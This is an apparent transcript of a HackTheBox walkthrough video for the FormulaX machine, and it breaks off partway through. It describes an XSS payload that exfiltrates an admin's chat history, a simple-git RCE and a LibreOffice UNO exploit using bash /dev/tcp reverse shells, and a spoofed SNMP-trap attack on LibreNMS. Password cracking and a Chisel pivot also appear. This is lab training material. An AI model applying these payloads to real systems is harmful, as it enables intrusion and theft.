Hello everyone and welcome to another video. In today's task, we'll try to exploit a machine on HackTheBox called FormulaX. Okay, let's get some information about the machine. So FormulaX is a high difficulty Linux machine featuring a chat application vulnerable to cross-site scripting, which can be exploited to uncover hidden subdomain. So the subdomain runs a simple-git version 3.14, which is vulnerable to CVE 2022-25912, and that's how we get our foothold into the machine as www data. We then crack a MongoDB password hash to escalate to a user Frank Doki. Then we exploit an SNMP trap vulnerability in the internal LibreNMS instance to gain a shell as user LibreNMS. And then credentials found in a file provide the password for another user called KaiRelay. And then finally, our privilege escalation vector to root is through formula injection via LibreOffice Calc app. All right. So yeah, so this is just a bit of information about the machine, and then let's try to see if we can replicate these steps to exploit the machine. Alright, so our IP address is ready. I click on it to copy to clipboard, and then we start our nmap scans. Alright, so let's do that. So we'll do let's say sudo nmap tag scv tag on. So our nmap file, we'll call it nmap something. Okay, and then we want verbose output, and then we can specify a minimum rate of, let's say, minimum rate of 10,000, and then yeah, we can slap our IP address in here to scan. All right, so I'll start the scan. Okay, I need to provide my password, and then the scan has started. This can take a bit of some time to scan, so because of that I already done the scan, and I'll show you the scan result. So let's clear the screen, and then I'll show the scan results with my Sublime text. Sublime nmap, I think it's called nmap results. Okay, so these are the nmap results. So you can see the nmap command that was used, and then we have two ports open. We have port 22 open SSH with version 8.9, and then we also have port 80 open and then HTTP and running an Nginx server. All right, so we have some supported methods: get, head, post, and options. We also have HTTP CORS, so we have CORS header set here. So CORS, that stands for cross origin resource sharing. So CORS accept get and post. So this is very important. We're going to come back to this CORS thing later, so let's take notes. And I think that's all about the information that we have from this scan result. So let's go over to our web browser and then try to enumerate port 80. All right, so we start with HTTP, and then the IP address in 10.11.6. Let's see what we have. Okay, so we are greeted with this your 24/7 problem solving chatbot. Okay, we can try default password. Let's say admin password. Okay, this doesn't authenticate us in. So there's also the ability to create an account. All right, so this is a function, so we can try to create an account. Don't save. So let's call the account test, and the email test, let's say test@test.com, and our password is just going to be test. All right, okay, so registration is successful. So let's try and log in. So our email was test@test.com, and our password was test. So let's see. So I think the password, I entered the wrong password. All right, so login successful, and this is what we have: chatbot, your real-time problem solver. All right, and then we have other links up here. So I'll just try to visit all these links and see what they have. So the home is what we are currently on, so that's the index page, and let's try to see about, change password, and contact S. So this logout functionality is going to log out. It's going to log the user out. So we know about that already. So let's go to the chat application. So chatbot, new way to solve problems. So due to the experimental nature, the results may be subject to inaccuracies. All right. And then okay, so this is a message coming from the chat server. All right, and then we can enter our message here. Let's say hello. Let's see hello. All right, my services are not available at this time for users. Sorry for the inconvenience. All right, so how are you? All right, so it's giving us the same message. Let's try to see if we can do some operation here. 5 plus 5. All right, so we are greeted with the same message. So it's telling us that the capabilities are not yet ready. So let's also try to say help. You know, mostly we want to find help from systems. So let's say help, and then when we put help, we find a different message. So this one is saying that history. Okay, so if it tells us that if we type history, it shows the previous sent messages. You can always ask random questions. All right, shows the previous sent messages. You can always ask random questions. So I think what it's telling us here is that history, for any user who type history, is going to bring back all the commands, or it's going to give you the history of all the commands you've typed in the prompt. All right, so let's type history and see. And yes, we have a prompt. We have all our prompt messages. So we type hello, how are you, try this operation, and then help. All right, so yeah, so this is what happens. So in a normal web testing, so the methodology would be to try these fields. Okay, this is an input field to see if we can do SQL injection, cross-site scripting, and other web attacks. So yeah, so nothing works here, so we're not going to spend a lot of time in this particular chat page. All right, so we go to the next link, which is about us. So this one has generic information about the website, about us, our vision, our mission, and then it has a link that leads you back to the home page. So nothing much here. We can close this for now, and then change password. All right, so it has a password reset capability. So you put old password. Okay, this is not password reset, this is actually change password. So you have your you know your password, you want to change to another password due to whatever reason. So this one will give you that chance to change your password to a probably more secure password. All right, so we have old password, new password. I try this function. So as a normal web application testing, you need to try all these fields to see if they are vulnerable to any web attacks, okay, like SQL injection, cross-site scripting, and other web attacks. And also here, like this was like a rabbit hole, nothing here. So yeah, so we don't see anything here. All right, so the link of interest is this, contact to admin. So here we can say test, and then my last name is also test, interestingly. So contact to admin, what we notice here is that whatever we send is going to be sent to admin to probably have a look at it, and then, well, you may have some information to request about the services the chat application offers. All right, so they've given us the opportunity to contact admin. Anytime we have access to send our information to someone at the other side, what comes to our mind first is trying to do cross-site scripting to probably steal credentials or impersonate the person. All right, so we can try instead of just typing anything, please help, we can try to inject cross-site scripting here in this field. So also first we can inject cross-site scripting in all the fields to find which one is vulnerable, but from the test is this particular text area field that is vulnerable. So this field is vulnerable to cross-site scripting. All right, but let's try and see if we can. Okay, so source is equal to, and then we try to fetch. Okay, so say on error, error, we want to fetch what are we fetching? So we want to fetch HTTP 10.10.14, and then we are going to set up a server and try to connect back to S. Alright, so how do we do that? Let's use Python m http.server, and let's listen on port 80. Alright, and then I'm just gonna check quickly my VPN IP address. So IPA, and we grep tan 0. So my IP is 155. All right, excellent. So I'll just put it here, and I'll try to request for a file that doesn't exist. So I'll say anything dot text. All right, so this is a self-closing tag. All right, so if this is vulnerable, it should make a request to our server. All right, so let's send this and then check our server to see. See, it made a request to our server. All right, and then we get the information that message unsupported method option. All right, so if it's requesting for anything.text, we are expecting it to make a GET request, but it's making an option request. All right, so this is because of the course headers which were set here. So you see cross origin resource sharing, so it's like a same origin policy is being implemented. All right, so what we can do is we can bypass this. I should have copied the command. All right, so what I'll do is I'll just try to take some notes. Sublime FormulaX note.txt. all right, so let's bring that one here, and then here our nmap results, I'll put them here. I always want to put my flags at the top, user flag and then root flag. We get a flag later. All right, so yeah, so our payload that we're using to text, we're using image, and then source is equal to anything, and then we were saying on error we needed to fetch HTTP 10.10.14.155, and then we're saying anything.txt. all right, and to bypass the cross origin or the same origin policy, we can add another object. We call it mode as no cost. All right, so we want to send our request without any checking of same origin policy. All right, so we copy this and then we go back to our form and we try to put it back in. Let's send. Let's see if we get the. All right, so now we see that we are now getting a GET request to anything.txt. all right, so this is fine. So what comes to our mind is, mostly if we have this capability, we know we can do cross-site scripting. We always try to store the cookies for any user who is trying to interact with the web page which has been exploited. All right, so if we inspect, let's inspect this page. If we inspect and then let's go to storage and then we look at our cookie settings. All right, so we can see that HTTP only is set to true. All right, so this is a mitigation for cookie stealing or session information stealing. All right, so because we have this HTTP only set to true, we will not be able to steal the administrator's cookies. All right, so we have to use a different method. So we are trying to now, what we do is to try and then load scripts into the page. All right, so that the script will run instead of getting the administrator's cookies. We'll try to load script onto the page. So our thinking here is that we want to get the commands the administrator put in the chatbot. So now we were the user, so we are trying to find the history of the administrator or of the administrator or administrative user. All right, so that's basically what we are going to do, or we are trying to store here is information about the administrator chat history. All right, so let's craft our payload. So what we do is so we say source, just like the what we had above. So we have on error. So on error, so we are going to create a script. All right, so we say var script is equal to document dot create element. We're going to create an element called script. All right, and then what do we do next? We say script dot source is equal to http 10.10.14.155. that's we are going to host a file here, and then the name of the file we're just going to call it payload.js. we haven't created this file yet, but we're going to do that shortly. All right, so we've created so this is going to be the source of the script we are going to embed, and then what we do next, we say we add the script or the tag or the element to the page. Which part of the page that we want to add it to depends on us. We can put it in the body or the head. All right, so we'll say document dot body dot append child. So we're going to append the child element, so that element is called script. All right, so this should be fine. Okay, so this is going to be our cross-site scripting payload, but we now have to create our payload that will exfiltrate the administrator's history, chat history. Okay, so to do that, we have to go back to the chat application and then see how it works. All right, we have to understand how the chat application works. So I think we can view page source, and then we can see that we have some embedded scripts. All right, so we have two scripts embedded here that handles the chat application. So we can see socket.io. So it's using socket.io to handle the chat application, and then we have a custom chat.js script here, so we can have a look at that. But whatever we do, we have to include the socket.io library. So let's look at the chat.js. So this is how the chat.js, this is how the chat application is implemented. All right, so looking through it, so it's makes a get request using Axios to user.api.chat. so this is an API endpoint, and then it creates a socket with credentials, and then listening for message. So this is the server listening for messages. All right, and then constant typing chat. So this is the client. So if a client types a message and then send it, then the server listens to the message and then makes a response. All right, so we're just gonna, you can create your own script from scratch, but we are going to just be a bit smart and still a bit of the functionality here to create our own, how do you call it, application. All right, so we are going to copy the parts of interest, so the server messages and then the client messages. I think this is where it ends. So this part is just doing what? HTML encode. I think this is not necessary. We will come back if we really need that part. So we create our payload.js. okay, so sublime payload.js, and then we paste this in. We're going to come back to this later. So as we said, any application that we are going to use, we have to add the library, the Axios, the socket.io library. So to do that, just as we did already, so we say var socket.io is the socket.io is equal to document dot create elements, and then we're gonna add a script. Okay, and then we say socket.io.source is going to be equal to is going to be equal to our socket.io. We're going to include this. All right, and then what do we do next? We say document dot body. You can put it body or head. Okay, this time let's put it in the head. Document dot head dot append child. So we are going to append, it's called socket.io. all right, so let's go back here. What is it? Did we say append? Okay, good, append. All right, that's good. So yeah, so this one is going to include the socket.io library into the chat application we're trying to create. Okay, so we say let value. So this value, let's see where the value is used again. So the value here, let's see. So the value document.getElement by ID user message. All right, so the user's message, that's what the user's message is going to go to the value. All right, but we want to hard code the user's message, so we will not need this value. We'll see this later. So we're going to remove this value. So we need this part, we need this get request to the endpoint, and then we need this object, socket object created. And then when we come to this part, we're listening for message. So this is the server part. So socket.on message. All right, so when the message is sent, so they show message on the screen. All right, so if we send a message through our prompt, so the server will take the message and then send back the response. So this is the server's response. All right, so what we're going to do here, we're going to comment this message. So the server tried to send a message onto the web page, but we wanted to send it to our server, the server that we are going to host. So we're going to use a fetch request. We're going to fetch. All right, and then what do we do? So we want it to be sent to http 10.10.14.155 sorry .155, and then you should send it to, let's call it admin history. Okay, we're gonna call that admin history, and then the message, so the server's response, all right, is what we're gonna receive here. So the message here, so we want to encode this message to base 64. All right, I hope that's it. Okay, and then we don't have to forget about our course. So we say mode is no course. All right, so this looks okay, this looks promising so far. Okay, and now when we come to the client part, all right, the client part, so that's where we're going to input our prompt. What we need is just this part. We don't need this is a function, so document.getElement, so we're not going to interact with the web page, we're just going to get it from the shell. So we can get rid of this, and then I think all this. Okay, so this one is also going to show the message on the page, and then it's going to clear the yeah, it's going to clear the prompt. Yeah, so we don't need any of this. We can clear this, and then the value which was passed. All right, so the value that we want to send to the server. Okay, sending the message to the server. So what message do you want to send to the server? So here we are going to hard code it to history. All right, we want to get the history. So what happens is that this is how the application is going to work. So when we start our prompt, so like we assume the administrator has logged in, so the administrator will send this history command, all right, and then it will go to the server, and it will action on the administrator's message, and the result is going to be this message here is going to be the history of the administrator. All right, then it's going to encode it, base64 encode it, and then send it to our server. So basically that's what this particular script will do. And then here I think we need to add an event listener. So we say socket io dot add event listener. Okay, so that's going to be on load. So if it loads, what should we do? So we just use this arrow function. All right, okay, then we can copy everything in there. Well, let's cut everything and put it in here. Let me not care too much about the indentation. So let's see, this is how our script is going to be like, and then if everything is okay, it should be able to steal the administrators. I'm not sure it's going to work just the first time. If it doesn't, we're going to troubleshoot it together and make it work. All right, so let's go over to our page and try to send. All right, so let's see if we can still send information to the server, to the admin here. This is the vulnerable. Okay, so it's still working. So sometimes this page gets expired, and then you need to create a new account to make it work. So in our instance, it's still working. So what do we do? So we copy our XSS payload. Okay, so username, first name, last name, this doesn't really matter. So what matters is this part, and then we send. But before we send, we have to make sure that our file is being hosted, our payload.js. So let's see. So see that payload.js is here. If we cut payload.js, we can see the script we just wrote, and we have staged it. This payload.js is staged. So what I'll do is I'll close this, clear, and then I'll restage it again. Come on, I'll restage it with Python 3.m http.server and then 80. I'm just restaging it, and I'll go and then I'll run my command. If everything works, I should receive something. Beautiful. Our script ran on the first try. I'm surprised that it ran. So we have some information about the administrator's history here. All right, so yeah, this is great. So we can copy, I don't know if some information is still coming back, or that's all of it. We can copy this into a file. So we copy it into a file called raw. So this is the raw data we've gotten from here. All right, so I've saved it, and then I'll just try to get meaningful information out of the raw data. So I'll grep. Let's see how it looks like. So I think I can grep for admin history. All right, so I'm going to grep for admin history from raw. All right, so it gives us only admin history, and then what do? I want this part. This is the base 64 part, which we will need to decode. All right, so yeah, so let's go back. So grep, and then I'll pipe it to awk, and then the full separator is going to be an equal sign. All right, and then I'll print 2. All right, so I have access to the second part. And then what else? Yeah, I think that should be it. And then I can try to remove duplicates. I can see some duplicates here. I'll just say sort, and I'll pipe to unique. Okay, so yeah, I have piped it to unique. And then what else do we do? And then I can pipe this to, I don't want to do this big 64 decoding individually, so what I'll do is I'll just run it through while read line. So while read line, so I will do echo -n line, then I'll pipe it to base 64 tag D, and then echo, and then done. Okay, so if this command is correct, it should be able to decode all this for me. Let's see. Yeah, beautiful. So it decoded the whole thing. Okay, so we can copy our command. This is a nice command. You can put it somewhere, or if you know how to use command line bash, it's not too complex. But if you don't, you can look at it, do it one step at a time. So this is the information. You can copy this. So we can call it admin chart history. All right, so this is the admin's chart history. Okay, so the admin's chart history. So can you help? How can I help you today? So this is the server, and then the admin. Hello, I am admin. And then what we are interested in is write a script for dev get auto update.chatbot.htb to work properly. All right, so this is the subdomain that we've been able to exfiltrate. So without having access to this admin history, we wouldn't have seen this subdomain. All right, so now that we have a subdomain, we can add it to our host files. So what I would do is let's clear this screen, and then sublime sudo sublime etc host. Okay, so we'll say 10.10.11.6, and then we have our subdomain. So now let's go to the subdomain and see if we can access it. So we say HTTP and then the subdomain. All right, beautiful. So now we have our subdomain. So under development, get auto report generator. So we can look at the page source and then see what is happening here. So there is an index.js, let's see, and then if you try to go through this JavaScript, you can see that it's making a get request, sorry, a post request to an endpoint called clone. So we assume it's doing a git clone. So this is a simple git. So simple git is used to automate git processes. And then we have the version number of the simple git. So we can try to see if we have some vulnerability. We can check for some vulnerability for this simple git. So we say exploits, simple git exploits, and let's check. All right, so this looks like it's interesting. We can go there and check. So we have remote code execution. That's only the interesting part. That's what can give us a shell. And then this is another version, remote code execution. Let's see. Yeah, I think this is what we need. So we can read a bit about the vulnerability and then the exploit. So this is like a POC. Okay, so it's doing a git clone, and then this extension it allow you to run shell commands. All right, so this is the POC. So we're gonna take part of the POC. We're not gonna use the whole thing, and then try to modify it to get our own instance. All right, so let's close this one. Do we need to close it? Let's see. Yeah, we can close it. Okay, all right, so I'm just gonna put it here, and then you can see that so it's running a shell command. So shell taxi touch, so it's creating a file, touch tempon. So this is the I think what we need, we can also modify it to our need. So say xt sh and then c. So instead of touching, what we need to do is like we are looking for a reverse shell. All right, so we're just gonna say bash tag I and then dev tcp 10.10.14.155 and then 443. That's the port I'm going to listen on, 443. All right, so this should be our reverse shell, but you can see that if there's a space between the arguments is separated by a percentage sign. So what we do is, so after the bash we put percentage sign here. So after every, if you know we're gonna have a space, so you escape it with this percentage sign. All right, and then I tried with the sh, it didn't work, so I tried bash. So instead of sh we can try to use bash. So this is just how you can try different things to make a POC work in your own environment. It doesn't always work from the box. Like when you can have to modify it in a way to make it work. So I realized that when I change this to bash, it worked for me. All right, so I'm copying this, then I'll send it to, so okay, let me come back here. Do I still need to host anything here? No. So I'll set up a listener here and see that LVMP 443. So this is where I'm going to listen on port 443, and then what do? I go back to the Git application and then I run it. All right, so this is the command that we're going to run. So if everything is okay, it should give us a reverse shell. All right, so it's saying loading, so this tells me that we may be lucky with a reverse shell. Yeah, good. So we have a reverse shell, and then if we do who am I, we are the user www data. So we may need to stabilize our shell. So let's try to use a Python 3 taxi import pty dot spawn, and then we have been bash. All right, so this is what we're going to use to stabilize the shell. Okay, all right, and then we export term equals to xterm, and then stty raw minus echo fg. Okay, so I will say alias cls is equal to clear. So I can always use cls to clear my screen. Good. So this is what we have if we do ls minus la. Okay, we have index.js node app. Okay, so we may try to move down a bit. We're just doing a directory enumeration, so we do cd tac. All right, and then we do ls. We have an app folder, automation folder, and git auto update folder. I think we were in the git auto update folder. Let's enter the app folder and see what we can get in there. Okay, so let's cd into app, and then ls minus la, and then what do we see? We see an environment variable. So mostly these environment variables contain credentials, so we are not sure, so it's worth having a look. So we can cut the environment variable, and then lo and behold, we have found some creds. Okay, we can copy this. Let's copy this somewhere. Let's see, they may come handy later. All right, so okay, so we have what? So this is MongoDB database running on localhost on this port, and then secret, and then admin. All right, so what we do is we'll just try to see if we can have access to the MongoDB database. So we say Mongo, and then I think we are lucky we didn't even access for credentials. I don't know why. All right, so this one, if you go into the configuration, you see that they didn't configure credentials for the login process. Okay, so so Mongo will say help to see the Mongo command. All right, I'm used to my SQL command, so yeah, it's always good to have it a look. And then if you want to check databases, we just say show dbs. All right, so we have admin, config, local, and then testing. So we're interested in this testing, so we say use testing. All right, so we switch to the testing database. All right, and then I think it's show collections or show tables. So let's say we are in MongoDB, so we say show collections to list the table. So we have messages, users, yeah, and then we are interested in this users table. So we'll say db.users.find. all right, so it's been able to get us all the information in the users table. So we can copy this out and put it somewhere you can see. Okay, so here I think we have ID. So this is one object, admin, another object, Frank Doki. All right, and then our own object when we created our user test. All right, so we are interested in this user Frank Doki because he has access, he's a user on the system. So let's exit MongoDB. All right, and then when we do grep, we are grepping this from etc pathwd. Okay, so you can see that we have how many users? Like 4 users. So we have root. We can copy this. So these are the users on the box with shells. All right. So we have root, LibreNMS, Kai Relay, and then Frank Docky. So Frank Docky is a user of interest. So if we have Frank Docky's hashed password, we can try to crack it and see if we can have access to the system as Frank Docky. So I'm just copying this and I'll put it somewhere. Okay. So let's do this. We can put it. We can use vim frank hash. Let's say frank hash. Okay. And then we put it in there. All right. So if we check frank hash, so we have it here. We can use hashcat or John. I don't know which one to use. So let me use John. All right. So I will say John word list is equal to user share word list rockq, infamous rockq, and then we'll just put frank hash in there to crack. All right. So let's see if John will be able to crack a frank password for us. So I'll just pause the video when it cracks, you know. Okay, wonderful. So it was able to crack Frank's password to Manchester United. So we add this to our notes. So I'll just say create. So user pass. So the password is Manchester United. The user is Frank Docky. All right. So we have Frank Docky, and then Manchester United as the user. So we can try to log in as Frank Docky. You can use SSH to have a proper shell. So I'm going to copy the password, and let's come back here. So we have a better user. Instead of using www data, I can exit out of www data, and our SSH as Frank is a Docky at 10.10.11.6. let's see, and then the password is Manchester United. All right, so we have access to the user Frank Docky as Manchester United. Okay, so if I do ls tag l, so we have user.test, so we can cut our user.txt. So we have our user flag. Good. So we have gotten our user flag. So the next thing is to go after the root flag. All right. So if we do ss tag lnpt, so we can see some listening sockets. So we have so many sockets, so many, and then we have this, we have that. Okay, so we can check all of them individually to see what they do. We can curl to see what they do. Okay, so to have access to this socket, we have to do some dynamic port forwarding. We can access them individually, but because we want to have access to all the ports, I prefer using dynamic port forwarding. Okay, so let's see what we're gonna do. Let's go back here and clear. So use chisel. So let me locate chisel. If you don't have chisel, you can download it from GitHub, but I have chisel, so I think I use chisel in my Wi-Fi native 2 box. So I'll just copy chisel into my local file folder, sorry. So if I see, I can see that I have chisel here, and then what I will need to do is to stage the chisel. Okay, I will need to stage it, like make it available for download remotely. So I'll use Python 3 tag m http server 80. All right, So I should be able to download Chisel. Okay, so let's use wget. Let's see, what do we have here? We have user.text, so wget 10.10.14.155, and then Chisel. Alright, so we have Chisel. I think it's downloaded. So what happens is that here, if we try to access any of this, we will not be able to have access to this. Let's try HTTP. See, we don't have access. We will not be able to have access to them. But when we finish the port forwarding, we should be able to have access to them. All right. So yeah. So let's do the port forwarding. Let's go back here. So we have Chisel. So we're gonna have our Chisel server here, and then as a proxy. No, I think it's # reverse, and then we're gonna use port 555. Okay, 555. All right, so the server tunneling is set up. Okay, so if we do ls-l, we have Chisel here, but it's not executable, so you have to make it executable. Chisel. All right, so let's try Chisel. Okay, so the Chisel is working. All right, so now we just have to do our port forwarding on the remote machine. So we see a Chisel, but now it's going to be a client, Chisel client, and then we want to tunnel back to our local machine on 10.10.14.155, and then the port we are using is 555, and then the reverse, and then we are going to use socks for dynamic port forwarding. All right. Okay, so we have it listening here on port 1080. Okay, so this is proxy change. So what you have to do is to check and make sure that you configure your proxychange.conf file. So if I do tail etc proxychange.conf, you can see that my proxy change files is configured for this port. So you have to do same if you haven't yet done. Just open this file and then add the source 5 leading to this localhost and then this port. All right, so if this is all right, we should be able to access the ports we're looking at. All right, so what I will do is okay, so what do we do? Okay, let's create another terminal. Let's log in. I think we need another user. So SSH. Let's do history. Okay, so we have this. Frank Doki, the password was Manchester United. Oh, come on. Okay. Oh, password is wrong. Paste. Okay, good. All right, so we do SNMPT, okay, and then these are the listening ports. We can try them, so let's try this port. Okay, we tried it already, didn't work, so still it's not working, so we have to go through proxy chains. All right, so I have already configured my proxy chains. If you haven't, you have to configure proxy chains on your browser. Let me see if I can get the settings. I can see the settings. So my proxies chains, so these are my proxy chain settings. So chains sox5 and then the host and then the port. All right, so if you haven't done this, you need to do that before you can access. So I'm just going to turn my proxy chains on. So I'm going to go through chains, and then I should be able to access the 127. Yeah, I should be able to access this. What's this? 127.0.0.1 and then 8000. All right, so this is remote management office. Okay, so this is one of the sites. Then let's see, this is not what we're looking for. Let's look at this. 3000. Okay, so yeah, we have LibreNMS. Okay, and then so this is LibreNMS. So I think NMS is for network monitoring system or management system. I'm not too sure, but it's one of them. It monitors or manages network devices. They send reports to it and then it takes actions. So this is what LibreNMS does. All right, so we try to log into LibreNMS as the user Frank Doki. So we have Frank's password. Okay, so Frank Doki and his password. Let's remember Frank. Let's see. Yeah, so we have access to. I didn't say you have access to the network management monitoring system. All right, so what do? We can just look around. So mostly, so it manages a lot of network devices. So it serves as the server, and then the devices serve as client, and then the request, and then they send information. There's exchange of information between the NMS and then the network devices. All right, so we can try to see how many network devices is being managed by this LibreNMS. All right, so if you go to I think you go to map, you go to device dependencies. All right, so you can see that it's only one device. So 10.10.11, you can see that device is on the same subnet. It's only one device that is being monitored or managed. All right, so we have to take note of this device is 10.10.11.240. So let's say network management service devices. So we have 10.10.11.240. all right, so we come back here and then we'll try to check. We can just look around to see what you can do, but mostly we want to see the version of the software running. So the version is 22.10. okay, so we can copy this and then try to check if there are any vulnerabilities available for it. So we have LibreNMS 22 exploits. So okay, I'm still going through the chain. Let me disable. So you have to always remember to disable if you don't want to go through the proxy chains. All right, so there is a very good write-up about this, about vulnerability, which is an SNMP trap vulnerability for that particular LibreNMS. All right, so this is, you come here, you get an understanding of how it works. So because of the vulnerability, an attacker is able to spoof an SNMP trap, which is sent to an event log, and then it's loaded to a dashboard. Like it looks like it sent as a stored XSS, all right, stored cross-site scripting, and then it loads onto a database. So if an administrator tries to access the dashboard, then it kicks in. Then the alert templates allow us to have a reverse shell. So it's not very difficult to understand if you go through, like, it's properly documented here. But what we are looking for is a POC, proof of concept, how we can actually implement this, because we need to create a spoofed SNMP trap. How do we do that, and how do we trigger it? All right, so let's keep looking to see if we can find anything. So I think this particular post also explains the same vulnerability, but with a proof of concept, which I think will be useful in our case. So let's see what we are doing here. So here we have the proof of concept here. So payload.js, so this is the payload, and then we have snmp trap.py. okay, so this is the spoofing. So this is what's going to spoof the SNMP packets. All right, and then this is the payload. This is I think the cross-site scripting payload, which is going to be embedded. All right, so let's create these files and then edit them to suit our need. So what do we do? Let's get out of here, and then I'll need space. Okay, let's clear this. So Sublime, what was the name? What do I have here? Let me see. Do I have payload already? Okay, so I'll say Sublime SNMP payload.js. okay, so we're gonna put our payload here, and then the other one is called what? SNMP trap.py. So we say Sublime send SNMP trap.py. all right, so we have two files here. Great. So what are we gonna do? Let's try and see where we can change. So here sending a post request, but here we have to remember to include the full path. If not, it's not going to work. So let's say HTTP, and then we're accessing it on port 127.0.0.1, sorry, on the socket, and then it was port 3000. Was it? Let's confirm. Yeah, so it's running on port 3000. okay, so yeah, and then this payload here is like, it's a reverse shell, so we have to also change it to suit our need. So we want to grab our reverse shell on 10.10.14.155, and then port 443. okay, so this one is okay, this one is done. all right, and then the snmp trap.py. so here, so the target is going to be 10.10.11.6. so we are going to target the SNMP, the LibreNMS system. So the LibreNMS is hosted on 10.10.6. okay, and then the source, mostly the trap are sent from the client devices. okay, so the SNMP traps are sent from the client devices. So it's going to be the only managed device, which was 10.10.11.240. okay, I think this is the NMS device. So this was the only device. So we're going to send a trap from this device onto the server. all right, onto the server here. okay, and then the payload, I think the payload is where is going to grab our SNMP payload. So our SNMP payload is going to be hosted on let's say 10.10.14.155, and not port 8000. I think it's going to be port 80. That's where I'm hosting it. So if it's port 80, you can just remove it and it should work. And it's not going to be called payload, it's called SNMP payload. I think that's how I saved it, SNMP payload. Okay, let's check and see if we need to modify anything else. I don't think so. All right, so this is fine. And then what happens is that we need to run this on the target. All right, we need to run this on the target. So let's go back and see if we can run this here. So this has nano, so let's say SNMP send. Okay, let's see, send come on, SNMP dot py. Okay, so let's name it as this, and then we paste our payload. I think that should do it. Okay, and then we save. So if we cut send SNMP, so our payload is, yeah, I think this is fine. And then I think we have to listen for a connection. Where should we listen? Where should we listen? Okay, we can listen down here. Okay, on pane 4. Let's listen on pane 4. So let's say, how do you call it? rl wrap nc.lvmp 443. Okay, so this is where we are listening, and then we come and run the payload. Okay, so it's a Python payload, so we have Python tray, and then I think it's send SNMP, right? Okay, and let's see. So one packet sent, so we are looking here to see if a request will be made. So no request have been made, so we're expecting a request to be made here if everything was done properly. Okay, so I think the request is not made because it's going to interact with the SNMP web interface, and our proxy chain is not on. So we put back our proxy chains, make sure our proxy chain is on, and then we try again. So let's try again to see. Okay, still not getting anything. Let's refresh this. Okay, let's see if we have any events. Okay, yeah, we've got some events. Some events have actually come through here. Okay, so I think it triggered a payload, and then we're expecting to get a reverse shell here. Okay, but it didn't come through, but the payload ran. Okay, it's triggered the payload. So let's run it one more time and see. So while that is happening, let's take a look at our SNMP payload.js. Okay, let's see if everything was set correctly. SNMP payload.js. Okay, so I think we had a problem here. Okay, yeah, I'm sure this is the reason why we didn't get the reverse shell. So I'm just saving it again, then we come back and run. Okay, it's taking some time. All right, very good. So we have a shell as, let's see, so we have a shell here. So if I do who am I am LibreNMS. Okay, so we can stabilize this shell if it's not already. So let's say export term equals to xterm, and then I can clear, and when I do ls minus la on LibreNMS, so let's do a full screen. So the user LibreNMS, when we look into the folder, we can see some config file here. So custom, some environment, some m file. Okay, so we have .custom.env. so this looks suspicious. This looks, is not a default file, so we have to have a look at it. So let's see what we have in there. So we cut this, and voila, we have some information about another user. All right, so let's copy this out. Okay, so we copy this out. Okay, so we have a user Chi relay, and then my chemical formula. So this is Chi relays, I think, credentials. So we can switch to Chi relays, user Chi relay. Let's do that. So I think we don't need Frank Donkey anymore. Yeah, we can switch here, switch to Chi relay, and then his password. Did I get the password right? Mechanical FormulaX. So I think okay, so yeah, so we are now the user Chi relay. If we do who am I, we are user Chi relay. Okay, and then if we do ls minus la, okay, let's move to Chi relays folder, ls minus la. Let's see if we have any interesting files or folders here. I don't see anything interesting. Okay, so what we can do is we try to access the other sockets. So we know this already, you know this, and then I think we check this. We didn't check this, so let's see. Yeah, so let's check this. All right, so we have remote management office work. So we assume Chi relays credentials should work for us here. Let's try. So password, and then user. All right, so successfully you've been authenticated into this is what, empowering work with LibreOffice Calc. Okay, and then yeah, we can look around to see. So we have a guide here. You start an instance, create a file to interact, and then we use tools like ctl, PyOO, and then PyLibreOffice to interact. All right, so this is like an open office application that you can interact on the command line. Okay, so if we can start the instance, let's start the instance again. Then it's telling us that the instance is already running. All right, so we know that the instance has started. We can create a file. So create a file for us. But let's go back to our shell and see if we can get some more information about Chi relay and what he can do. So we do sudo tag-l, and then we can see that the user should be able to run this file without password. So the file is office office.sh. okay, so if we try to check what the file is, it's just a bash script, okay, and then which is ASCII, so it means it had readable text. So let's cut the text, and this is what it does. So it's just a bash script to start the OpenOffice in the background. So it's going to start LibreOffice Calc, and then it will accept this, and no restore, so it's like no window, and headless. So the headless is like no GUI, no graphic user interface. So it's going to do all this. You can interact with the LibreOffice Calc in the command line without any graphical user interface. All right. So we can try to see the version of, we can do which S Office. Okay, so yeah, S Office is installed. So you can check its version. And then yeah, we see that it's LibreOffice and with this version. Okay, that's fine. And then when we look at the bash script, it's starting this particular LibreOffice, and then it's starting it on this port, so port 2002. So if we check here, we can see that when we checked, it was not running at this time. All right, but I'm sure after we started it here, we should now see the ports open. So let's check. Let's just confirm. So ss stack lmpt, and then yeah, you see that it's now running. Okay, it's running now. So what we can do is we can try to do some enumeration about it. We can check for LibreOffice 7 vulnerabilities. We can do that. Let's try. So exploits. Okay, I think we are going through the proxy chain. Let's disable our proxy chain, cancel, and then we do this again. All right, so yeah, LibreOffice 7. So we have so many exploits here, but you may not know which one to use. All right, so you have to do further enumeration. So what I did is you could try to connect to, when you try to curl it, you know that it's not a web application. So when you try to curl this, so it's telling you that's not allowed. So received HTTP, which is not allowed. So it's telling you that you cannot do a curl. So we can try a netcat. So nc instead, and then we'll see what we get. All right, so when you do a netcat, it brings a response. We get a response, but we don't know what this is. We can just try to search this on the internet. So let's go back and do a quick search. What is this? All right, so interestingly, we see an exploit DB exploit. It says Apache Uno LibreOffice version 6.1, or okay. So it happens that this particular version 6.1 was vulnerable to this exploit, but it still applies to current versions or all versions of LibreOffice. It's not like a vulnerability, but it's just like a function. All right, so it's just like a function. So if the API, if the Apache OpenOffice API is present, okay, so if it's present, then this exploit should work. Okay, so we have the exploit here. We can do a rundown of the exploit, but it's very simple exploit to use. So, but the exploit is, I think, it's running on a Windows system, and it's trying to invoke the calc.exe. So we're gonna change this, and then so let's copy this exploit and try to modify it to our need. So that's what I'm gonna do here. get out of the netcat. So I'll use nano, and then nano. What's the name of the exploit? I'll say Soffice exploit.py. Alright, and then I'll paste it in here. Okay, so let's see what we are going to change here. I don't think there's anything we need to change. We just have to change this. Okay, so instead of running calc, we need to run reverse shell.sh. Okay, so this reverse shell is we're going to create this reverse shell. All right, and then the reverse shell. Okay, so let's save this for now. So if we list, we don't have anything called reverse shell here, so we need to create it. And then yeah, so let's create nano reverse shell.shell, and then okay, so bash tag I, and then bash tag I. Oh, come on, I can type. And then def tcp 10.10.14.155, and then port 443, and then we do this. Yeah, so this should be our reverse shell if everything is right. So let's save this. All right, so let's list. We can now see our ref shell, but it's not executable, so we do chmod, and then ref shell, we do list, and then now you can see that it's executable. All right, but we need to reference an absolute path to this reverse shell. So let's do pwd, so we can see that we are in home car relay. All right, and now we can go back and change our Soffice exploit. All right, so here we're gonna use an absolute path. If not, it 